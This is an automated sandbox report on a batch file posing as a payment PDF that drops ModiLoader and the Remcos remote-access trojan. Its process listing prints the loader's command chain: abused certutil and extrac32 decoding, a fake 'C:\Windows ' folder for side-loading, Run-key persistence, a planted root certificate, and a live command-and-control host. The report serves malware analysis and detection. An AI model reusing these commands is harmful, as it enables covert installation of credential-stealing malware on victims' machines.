Malware Analysis Report

2025-01-02 03:03

Sample ID 240813-khw45atdrb
Target PAYMENT TRANSFER ERROR.PDF.bat
SHA256 de6f03e7fe7a7c5aa0462d01bd825650bd44acb38e130fc106de4b2c63d7f046
Tags
modiloader remcos remotehost discovery persistence rat trojan collection credential_access stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de6f03e7fe7a7c5aa0462d01bd825650bd44acb38e130fc106de4b2c63d7f046

Threat Level: Known bad

The file PAYMENT TRANSFER ERROR.PDF.bat was found to be: Known bad.

Malicious Activity Summary

modiloader remcos remotehost discovery persistence rat trojan collection credential_access stealer

Remcos

ModiLoader, DBatLoader

Credentials from Password Stores: Credentials from Web Browsers

ModiLoader Second Stage

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Script User-Agent

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-13 08:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-13 08:36

Reported

2024-08-13 08:39

Platform

win7-20240708-en

Max time kernel

148s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wclbjzkj = "C:\\Users\\Public\\Wclbjzkj.url" C:\Users\Public\Libraries\AHA.COM N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\xpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Libraries\AHA.COM N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SndVol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\esentutl.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Public\Libraries\AHA.COM N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 C:\Users\Public\Libraries\AHA.COM N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\AHA.COM N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\AHA.COM N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1716 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1716 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1716 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1724 wrote to memory of 1708 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1724 wrote to memory of 1708 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1724 wrote to memory of 1708 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1716 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2284 wrote to memory of 2248 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2284 wrote to memory of 2248 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2284 wrote to memory of 2248 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1716 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2240 wrote to memory of 2848 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2240 wrote to memory of 2848 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2240 wrote to memory of 2848 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1716 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 760 wrote to memory of 2952 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 2952 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 2952 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 2952 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 2952 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 1936 wrote to memory of 1448 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 1936 wrote to memory of 1448 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 1936 wrote to memory of 1448 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 1936 wrote to memory of 1448 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 2952 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AHA.GIF" / A / F / Q / S

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Libraries\jkzjblcW.cmd" "

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Users\Public\xpha.pif

C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Windows \SysWOW64\per.exe

"C:\\Windows \\SysWOW64\\per.exe

C:\Windows \SysWOW64\per.exe

"C:\Windows \SysWOW64\per.exe"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AHA.COM /d C:\\Users\\Public\\Libraries\\Wclbjzkj.PIF /o

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 2007.filemail.com udp
DE 50.7.84.74:443 2007.filemail.com tcp
DE 50.7.84.74:443 2007.filemail.com tcp
N/A 127.0.0.1:59089 tcp
US 8.8.8.8:53 legacyrem.duckdns.org udp
MY 103.186.116.130:59089 legacyrem.duckdns.org tcp
MY 103.186.116.130:59089 legacyrem.duckdns.org tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\AHA.GIF

MD5 2ddfa3ebd56847d40e59f092be0e6568
SHA1 3e56b1a986cd5600bc8dd134f1ff2ce5dbd53827
SHA256 11693a473afe426024135c37b1013491c2e98d89e6c9da6edfcc0a8c28bf1d02
SHA512 92816361505672a82452ed2036120a3d45e6abfa52577db819ba56318109da5242428bdf521751d6832976bc63831ddbaf0c10ad6563d26ed7b177f276421652

C:\Users\Public\Libraries\AHA.COM

MD5 d70fa5471771d18888f0861ac060a914
SHA1 83ef28ef9e4850629433f497fd0360120449e297
SHA256 31a7e70deb8af07d7b76b5dea8cbf90ec63bea24bffdd5ebac6f223c02f55753
SHA512 af89922e5a24a12522603e4a034b2e1aef911d5cf6399de426aa95b971dcf70513a99f45033895939f0475d7b001054717c9b0d38278ff45ee2b41376f3da31b

memory/760-34-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

memory/760-36-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

memory/760-38-0x0000000000400000-0x0000000000540000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB6E3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarB714.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Public\Libraries\jkzjblcW.cmd

MD5 b87f096cbc25570329e2bb59fee57580
SHA1 d281d1bf37b4fb46f90973afc65eece3908532b2
SHA256 d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e
SHA512 72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

\Users\Public\alpha.pif

MD5 ad7b9c14083b52bc532fba5948342b98
SHA1 ee8cbf12d87c4d388f09b4f69bed2e91682920b5
SHA256 17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae
SHA512 e12aad20c824187b39edb3c7943709290b5ddbf1b4032988db46f2e86da3cf7e7783f78c82e4dc5da232f666b8f9799a260a1f8e2694eb4d0cdaf78da710fde1

C:\Users\Public\xpha.pif

MD5 6242e3d67787ccbf4e06ad2982853144
SHA1 6ac7947207d999a65890ab25fe344955da35028e
SHA256 4ca10dba7ff487fdb3f1362a3681d7d929f5aa1262cdfd31b04c30826983fb1d
SHA512 7d0d457e1537d624119a8023bcc086575696a5739c0460ef11554afac13af5e5d1edc7629a10e62834aba9f1b3ab1442011b15b4c3930399d91dca34b3b1cbaf

C:\Windows \SysWOW64\per.exe

MD5 869640d0a3f838694ab4dfea9e2f544d
SHA1 bdc42b280446ba53624ff23f314aadb861566832
SHA256 0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA512 6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

memory/1144-138-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-143-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-142-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-141-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-137-0x0000000002640000-0x0000000003640000-memory.dmp

memory/1144-145-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-146-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-147-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-148-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-149-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-150-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-156-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-157-0x000000002C460000-0x000000002C4E2000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 b875da0a35144e3e532af56571df9959
SHA1 ba378dcc14882571fd7c23e680bd7c499644dba9
SHA256 aeb083a04ac3b1472d18bf411feee008fdd4a9f43d698d472b22799565064235
SHA512 238710866ca2d659047c88e059367896e4d39cdef43c3fb6dc3210d3772a3ed3f6d1aa2169bca8925d91c9803407c70014e483e09cd3ae07ea71e782dd12bda6

memory/1144-164-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-165-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-168-0x000000002BF60000-0x000000002BF79000-memory.dmp

memory/1144-171-0x000000002BF60000-0x000000002BF79000-memory.dmp

memory/1144-172-0x000000002BF60000-0x000000002BF79000-memory.dmp

memory/1144-173-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-178-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-179-0x000000002C460000-0x000000002C4E2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-13 08:36

Reported

2024-08-13 08:39

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows \SysWOW64\per.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\SndVol.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wclbjzkj = "C:\\Users\\Public\\Wclbjzkj.url" C:\Users\Public\Libraries\AHA.COM N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1660 set thread context of 2892 N/A C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe
PID 1660 set thread context of 1116 N/A C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe
PID 1660 set thread context of 3668 N/A C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SndVol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SndVol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SndVol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\xpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Libraries\AHA.COM N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\alpha.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SndVol.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\esentutl.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Public\pha.pif N/A
